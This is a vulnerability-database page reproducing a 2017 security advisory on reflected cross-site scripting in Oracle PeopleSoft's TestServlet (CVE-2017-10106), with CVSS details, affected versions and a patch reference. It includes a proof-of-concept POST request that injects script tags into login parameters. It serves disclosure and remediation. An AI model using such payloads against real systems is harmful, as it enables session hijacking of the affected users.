Vulners
Lucene search
Oracle PeopleSoft ToolsRelease 8.55.03 / ToolsReleaseDB 8.55 / HCM 9.2 XSS Vulnerabilities
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | Oracle PeopleSoft Enterprise PeopleTools Remote Vulnerability (CNVD-2017-21153) | 10 Aug 201700:00 | – | cnvd |
 | CVE-2017-10106 | 8 Aug 201715:00 | – | cve |
 | CVE-2017-10106 | 8 Aug 201715:00 | – | cvelist |
 | Multiple XSS Vulnerabilities in TestServlet (PeopleSoft) | 26 Jan 201700:00 | – | erpscan |
 | EUVD-2017-1753 | 7 Oct 202500:30 | – | euvd |
 | CVE-2017-10106 | 8 Aug 201715:29 | – | nvd |
 | Oracle Critical Patch Update Advisory - July 2017 | 20 Mar 201800:00 | – | oracle |
 | PeopleSoft ToolsRelease 8.55.03 / ToolsReleaseDB 8.55 / HCM 9.2 XSS | 21 Jul 201700:00 | – | packetstorm |
 | Code injection | 8 Aug 201715:29 | – | prion |
 | CVE-2017-10106 | 8 Aug 201715:00 | – | vulnrichment |
10
1. ADVISORY INFORMATION
Title: Multiple XSS (POST request) Vulnerabilities in TestServlet (PeopleSoft)
Advisory ID: [ERPSCAN-17-037]
Advisory URL: https://erpscan.com/advisories/erpscan-17-037-multiple-xss-vulnerabilities-testservlet-peoplesoft/
Risk: Medium
Date published: 18.07.2017
Vendor contacted: Oracle
2. VULNERABILITY INFORMATION
Class: XSS [CWE-79]
Impact: Modify displayed content from a Web site, steal authentication
information of a user
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2017-10106
CVSS Information
CVSS Base Score v3: 6.1 / 10
CVSS Base Vector:
AV: Attack Vector (Related exploit range) Network (N)
AC: Attack Complexity (Required attack complexity) Low (L)
PR: Privileges Required (Level of privileges needed to exploit) None (N)
UI: User Interaction (Required user participation) Required (R)
S: Scope (Change in scope due to impact caused to components beyond
the vulnerable component) Changed (C)
C: Impact to Confidentiality Low (L)
I: Impact to Integrity Low (L)
A: Impact to Availability None (N)
3. VULNERABILITY DESCRIPTION
An attacker can use a special HTTP request to hijack session data of
administrators or users of the web resource.
4. VULNERABLE PACKAGES
ToolsRelease: 8.55.03
ToolsReleaseDB: 8.55
PeopleSoft HCM 9.2
# Component: com.peoplesoft.pt.portlet.service.test.TestServlet
$ md5sum pspc.war/WEB-INF/classes/com/peoplesoft/pt/portlet/service/test/TestServlet.class
16634cea4be75869127b76cfc627f894
pspc.war/WEB-INF/classes/com/peoplesoft/pt/portlet/service/test/TestServlet.class
5. SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, implement Oracle CPU July 2017
(http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html)
6. AUTHOR
Dmitri Iudin aka @ret5et
7. TECHNICAL DESCRIPTION
7.1. Proof of Concept
PoC
"""
POST /pspc/test?userID=<script>alert(1)</script>&password=<script>alert(2)</script>&languageCode==<script>alert(5)</script>&siteName=<script>alert(3)</script>&CREFName=<script>alert(4)</script>&portalName=<script>alert(6)</script>&command=login
HTTP/1.1
Host: 172.16.2.230:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0 twitter:@ret5et
Accept-Encoding: gzip, deflate
Content-Length: 0
"""
8. REPORT TIMELINE
reported to the vendor - 2017-01-26
Date published: 18.07.2017
# 0day.today [2018-01-01] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Jul 2017 00:00Current
6.7Medium risk
Vulners AI Score6.7
EPSS0.00806